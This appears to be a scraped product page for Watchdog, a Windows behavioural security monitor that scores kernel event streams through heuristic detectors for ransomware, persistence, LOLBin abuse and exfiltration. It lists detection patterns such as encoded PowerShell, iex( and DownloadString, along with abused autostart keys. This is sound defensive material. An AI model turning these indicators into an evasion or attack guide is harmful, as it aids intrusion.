Watchdog is a single-binary behavioural security monitor for Windows. It subscribes to the kernel's own event streams, enriches every event with live process context, and scores them through thirteen heuristic detectors against a baseline it learns at runtime — no signature lists, no threat feeds, no cloud.
Watchdog subscribes to five Event Tracing for Windows providers in a single real-time session — the same plumbing Defender, EDR products and Process Monitor use. A sixth synthetic sensor polls for new drive letters. Everything it reports comes from the local system, observed through Windows' own instrumentation.
\Windows\ and \Program Files\. Writes feed the ransomware detectors; reads don't.
SetValueKey operations — writes to registry values.
QueryDosDevice every 2s. A new drive letter (USB, SD, mapped share) emits a RemovableDriveMounted event into the same pipeline.
Each event is resolved on the way through: process lookup from a live CreateToolhelp32Snapshot table, NT device paths canonicalised to C:\…, command lines fished out via NtQueryInformationProcess, Authenticode checked with WinVerifyTrust, and System-attributed connects re-mapped to their real owning process.
Each detector emits a sub-score in [0.0, 1.0]. The scorer combines them via 1 − Π(1 − sᵢ) so independent signals reinforce without saturating. Severity buckets: Info ≥ 0.30 · Warn ≥ 0.40 · Crit ≥ 0.70.
A signed-but-abusable Windows binary (mshta, rundll32, certutil, powershell…) running with malware-pattern command lines: -EncodedCommand, iex(, DownloadString, base64 blobs.
Rarely-benign process chains: word/excel → cmd/powershell, chrome → shell, lsass → anything. Useful even without baseline — these chains are almost never legitimate.
Writes to 14 well-known autostart locations: Run, RunOnce, Image File Execution Options, Winlogon\Shell, AppInit_DLLs, service ImagePath, Active Setup…
A process touching ≥25 distinct directories in 10s — the canonical ransomware / bulk-exfil fingerprint. Baseline-aware: legitimate I/O-heavy processes get suppressed after familiarisation.
peaks at CRITA process writing a burst of high-entropy files (Shannon ≥ 7.8 bits/byte, sampled from the first 4 KiB) — encryption caught in the act. Already-compressed formats (zip, jpg, office, pdf…) are denylisted to avoid false hits.
peaks at CRITA binary running from a user-writable path (%TEMP%, %APPDATA%, Downloads, Desktop, ADS) with no valid Authenticode signature, verified through WinVerifyTrust. Highest-yield for downloaded malware.
A program seen running many times before — but never connecting out — just made its first outbound TCP connection. Suggests a previously-silent process is now phoning home.
peaks at WARNA mature, focused program connecting to an external /24 (v4) or /48 (v6) prefix it has never used. Complements NewNetworkEgress; chatty clients (>32 prefixes) and LAN/loopback are auto-excluded.
peaks at WARNMulti-evidence: ≥2 of {label entropy > 3.5 bits/char, abused TLD (.tk .xyz .top .icu…), label ≥ 40 chars}. Single hits alone are too noisy — CDNs use random-looking subdomains too.
peaks at CRITTemporal correlation: a removable drive letter just appeared, and within 5 minutes a process writes ≥10 distinct files to that drive. Two domains, one inference.
peaks at CRITA critical system image (svchost, lsass, services, csrss…) launched from outside its expected directory, or an svchost not parented by services.exe. Classic process-masquerading move.
An unsigned or untrusted module (DLL) loaded from a user-writable path — DLL sideloading / search-order hijacking. Verified with the same WinVerifyTrust cache; the process's own primary image is skipped.
An interactive process launched during an hour this host is normally idle, judged from a learned hour-of-day profile (≥5 days observed). On its own it's just an amplifier — it nudges other signals up.
peaks at INFOWatchdog keeps a per-image profile that accumulates as it runs — observed parents, children, peak file-traversal counts, network destinations, whether the image ever connected out. After five samples an image is mature, and baseline-aware detectors trust the learned ceiling.
Persists to %ProgramData%\Watchdog\baseline.bin every 5 minutes, so the learning ramp happens once per machine. LOLBins are excluded by design — an attacker can't train the system to ignore powershell by repeating the same malicious act.
The TUI defaults to a consumer-facing summary. Three deeper pages are one keystroke away from anywhere — raw, network, offensive.
Six panels in two columns, built so a non-analyst can answer "is something bad happening?" in five seconds.
Time-ordered stream of every scored event. The 50,000-event buffer evicts by score-biased rule — a Defender scan can't wipe a WARN powershell from twenty minutes ago.
Read-only inventory of everything on the wire: interfaces, neighbors, live TCP table, and a per-host inspector.
Currently one read-only tool: a WiFi scan from the WLAN API's cached results. No active attack code — strictly educational.
A monitor that overstates its coverage is worse than useless. Here is exactly where Watchdog is blind.
No installer, no driver, no kernel component. Download the single watchdog.exe, open an elevated terminal, and run it — or install it via Scoop. An optional background service mode is built in for always-on, headless use.
requireAdministrator manifest, so Windows raises the UAC prompt on launch automatically.install-service